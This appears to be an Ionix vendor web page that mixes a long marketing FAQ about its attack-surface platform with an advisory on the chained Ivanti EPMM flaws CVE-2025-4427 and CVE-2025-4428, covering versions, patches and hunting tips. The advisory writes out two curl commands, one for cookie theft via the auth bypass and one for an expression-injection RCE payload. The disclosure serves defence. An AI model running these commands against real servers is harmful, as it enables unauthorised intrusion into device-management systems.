CVE-2025-4427 is an API authentication bypass vulnerability in Ivanti Endpoint Manager Mobile (EPMM), allowing unauthenticated users to access endpoints that should require login. CVE-2025-4428 is an authenticated remote code execution flaw, enabling attackers to execute arbitrary commands on affected servers. Both vulnerabilities can be chained for pre-auth RCE and are actively exploited. (Source: Ionix Blog, May 18, 2025)
Affected versions include anything ≤ 12.5.0.0, as well as the 11.x and 12.3/12.4 maintenance branches: 11.12.0.4 and older, 12.3.0.1 and older, 12.4.0.1 and older, and 12.5.0.0 and older. Fixed builds are 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1. (Source: Ionix Blog)
Attackers first abuse CVE-2025-4427 to steal an unlocked API session cookie, then use CVE-2025-4428 to send a malicious payload that triggers remote code execution. This chain allows pre-auth RCE, bypassing all UI controls. (Source: Ionix Blog)
Risks include data exposure (device inventory, security posture, MDM certificates), lateral movement (credential scraping, web-shell deployment), mobile device takeover, compliance breaches (GDPR, PCI-DSS, ISO 27001), and ransomware staging. (Source: Ionix Blog)
Immediate patching to fixed builds is recommended. Temporary workarounds include restricting /mifs and /mifs/admin paths to internal IPs, enabling two-factor admin login, disabling EL evaluation in custom validation logic, and conducting threat hunting and forensics. (Source: Ionix Blog)
Organizations can use the Ionix Exposure Management Platform to validate exploitability across Internet-facing hosts and prioritize RCE chains that are effective in their environment. (Source: Ionix Blog)
Ionix customers can view updated information on their specific assets in the Threat Center of the Ionix portal, where the security research team provides assessments based on exploit simulation models. (Source: Ionix Blog)
References include NVD entries, Tenable Research advisory, watchTowr Labs deep dive & PoC, Rapid7 exploit-in-the-wild analysis, and The Hacker News coverage. (Source: Ionix Blog)
Ionix provides continuous validation, exploit simulation, and asset impact assessment for vulnerabilities like CVE-2025-4427 and CVE-2025-4428, helping organizations prioritize and remediate risks. (Source: Ionix Blog)
The Ionix Exposure Management Platform validates exploitability, prioritizes RCE chains, and provides actionable insights for remediation across Internet-facing hosts. (Source: Ionix Blog)
Apply Ivanti’s fixed builds (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) immediately as per the official advisory. (Source: Ionix Blog)
Restrict /mifs and /mifs/admin paths to internal IP ranges, enable two-factor admin login, and disable EL evaluation in custom validation logic. (Source: Ionix Blog)
Search web-server logs for requests to /featureusage, heartbeatCheck, licenseCheck, and getState API calls. Scan for new .jsp, .war, or .class files in ${EPMM_HOME}/tomcat/webapps/. (Source: Ionix Blog)
Abuse of MDM infrastructure can jeopardize GDPR, PCI-DSS, and ISO 27001 controls for secure mobile management, leading to compliance breaches. (Source: Ionix Blog)
Ionix enables continuous validation by monitoring the evolving attack surface, simulating exploits, and updating customers on asset impact in real time. (Source: Ionix Blog)
You can watch a short demo of Ionix's CTEM program and see how to find and fix exploits quickly at the Ionix Demo Center.
Ionix provides attack surface discovery, exposure validation, risk prioritization, and streamlined risk workflows to help organizations systematically reduce their attack surface. (Source: Ionix Solutions)
Ionix solves fragmented external attack surfaces, shadow IT, unauthorized projects, lack of proactive security management, real attack surface visibility, critical misconfigurations, manual processes, and third-party vendor risks. (Source: Ionix Customer Success Stories)
Key features include attack surface discovery, risk assessment, risk prioritization, risk remediation, exposure validation, and streamlined workflows. The platform uses ML-based Connective Intelligence for better asset discovery and fewer false positives. (Source: Ionix Attack Surface Discovery)
Yes, Ionix integrates with Jira, ServiceNow, Splunk, Microsoft Azure Sentinel, Cortex XSOAR, Slack, AWS, GCP, Azure, and other SOC tools. Additional connectors are available based on customer requirements. (Source: Ionix Integrations)
Yes, Ionix provides an API for seamless integration with major platforms, supporting data retrieval, incident export, and ticket creation for collaboration. (Source: Ionix API)
Ionix automatically identifies and prioritizes attack surface risks, enabling teams to focus on remediating the most critical vulnerabilities first. (Source: Ionix Attack Surface Discovery)
Connective Intelligence is Ionix's ML-based discovery engine that maps the real attack surface and digital supply chains, finding more assets with fewer false positives than competing products. (Source: Why Ionix)
Ionix provides actionable insights and one-click workflows, with off-the-shelf integrations for ticketing, SIEM, and SOAR solutions, reducing mean time to resolution (MTTR). (Source: Ionix Attack Surface Discovery)
Ionix delivers immediate time-to-value, providing measurable outcomes quickly without impacting technical staffing. (Source: Ionix Customer Success Stories)
Ionix helps organizations maintain compliance by identifying vulnerabilities and exposures that could jeopardize GDPR, PCI-DSS, and ISO 27001 controls. (Source: Ionix Blog)
Target users include Information Security and Cybersecurity VPs, C-level executives, IT professionals, security managers, and decision-makers in Fortune 500 companies, insurance, energy, entertainment, education, and retail sectors. (Source: Ionix Customers)
Industries include insurance and financial services, energy and critical infrastructure, entertainment, and education. (Source: Ionix Case Studies)
Yes, E.ON used Ionix to discover and inventory internet-facing assets, Warner Music Group improved operational efficiency, Grand Canyon Education managed vulnerabilities proactively, and a Fortune 500 Insurance Company enhanced security measures. (Source: Ionix Case Studies)
Ionix provides comprehensive visibility and continuous monitoring of internet-facing assets and third-party exposures, helping organizations manage expanding cloud environments and digital ecosystems. (Source: Ionix Customer Success Stories)
Ionix identifies unmanaged assets resulting from cloud migrations, mergers, and digital transformation initiatives, ensuring better risk management. (Source: E.ON Case Study)
Ionix streamlines workflows, automates processes, and provides actionable insights, reducing response times and improving operational efficiency. (Source: Warner Music Group Case Study)
Ionix helps manage risks such as data breaches, compliance violations, and operational disruptions caused by third-party vendors through comprehensive attack surface management. (Source: Ionix Customer Success Stories)
Customers report challenges with fragmented attack surfaces, shadow IT, reactive security, lack of attacker-perspective visibility, critical misconfigurations, manual processes, and third-party risks. (Source: Ionix Customer Success Stories)
Ionix offers ML-based Connective Intelligence for better asset discovery, proactive security management, real attacker-perspective visibility, comprehensive supply chain mapping, streamlined remediation, ease of implementation, and competitive pricing. (Source: Why Ionix)
Customers should choose Ionix for its superior discovery capabilities, proactive threat management, comprehensive supply chain coverage, streamlined remediation, ease of deployment, and proven ROI. (Source: Ionix Customer Success Stories)
Ionix addresses value objections by showcasing immediate time-to-value, offering personalized demos, and sharing real-world case studies with measurable outcomes. (Source: Ionix Intro Sales Deck Transcript)
Ionix offers flexible implementation timelines, dedicated support, seamless integration, and emphasizes long-term benefits to align with customer schedules and priorities. (Source: Unknown)
Ionix provides a dedicated support team, off-the-shelf integrations, and streamlined onboarding to ensure efficient and effective implementation. (Source: Why Ionix)
Ionix is simple to deploy, requiring minimal resources and technical expertise, with immediate time-to-value and support for integrations with major platforms. (Source: Why Ionix)
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.
IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.
IONIX provides **multi-factor asset discovery**, **dependency mapping**, and **continuous monitoring** to uncover unknown or orphaned assets across domains, clouds, and suppliers. *[Source: [Help Net Security, 2025](https://www.helpnetsecurity.com/2025/08/14/ctem-platforms-2025/)]*
Recommended for **mid-sized to enterprise organizations** with complex, distributed attack surfaces that need continuous visibility and risk prioritization. *[Source: [Expert Insights](https://expertinsights.com/network-security/the-top-external-attack-surface-management-easm-software)]*
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.
IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence, an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar, which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.
When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain, automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems.
Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud, enriching their alerts with AI-driven external exposure context to provide a unified view of risk.
IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs), essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.
IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.
Ivanti’s Endpoint Manager Mobile (EPMM, formerly MobileIron Core) just delivered an unpleasant one-two punch to defenders. Two fresh vulnerabilities—an authentication bypass (CVE-2025-4427) and an API-level remote-code-execution flaw (CVE-2025-4428)—can be chained to grant unauthenticated attackers full command execution on affected servers. Both issues are already being exploited in the wild, making rapid remediation essential.
In this article
CVE-2025-4427 – API Authentication Bypass
A logic flaw in the /mifs REST API incorrectly validates session tokens, letting remote, unauthenticated users reach endpoints that should be gated behind login. CVSS 3.1 base: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A: N).
CVE-2025-4428 – Authenticated Remote Code Execution
Once on an API endpoint, attackers can pass malicious server-side template expressions that Hibernate Validator processes inside a Spring bean. Unsafe evaluation leads to arbitrary command execution as the tomcat user. CVSS 3.1 base: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Affected versions (best public data) – anything ≤ 12.5.0.0 as well as the 11.x and 12.3/12.4 maintenance branches:
Fixed builds: 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1.
Because CVE-2025-4428 requires an authenticated session, threat actors first abuse CVE-2025-4427 to grab an unlocked API cookie. The most reliable path so far targets /mifs/admin/ endpoints:
bash
CopyEdit
# 1. Steal a session cookie via auth-bypass
curl -isk "https://<target>/mifs/admin/heartbeatCheck" \
-H "Accept: application/json" \
| grep 'Set-Cookie: ZSESSIONID' | cut -d';' -f1With that cookie, attackers send a malicious payload using WatchTower’s disclosed endpoint:
bash
CopyEdit
# 2. Trigger SSTI to achieve RCE
curl -isk "https://<target>/mifs/admin/rest/api/v2/featureusage" \
-H "Cookie: ZSESSIONID=<stolen>" \
-H "Content-Type: application/json" \
-d '{"expr":"${T(java.lang.Runtime).getRuntime().exec(\"id\") }"}'If successful, the response body leaks the command output—proof that the server executed arbitrary OS commands.
Why this chain matters: CVE-2025-4427 on its own “only” reveals limited configuration details. But once combined with CVE-2025-4428, the attacker instantly upgrades to pre-auth RCE, bypassing every control EPMM’s UI appears to enforce.
IONIX is actively tracking these vulnerabilities. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.
IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.
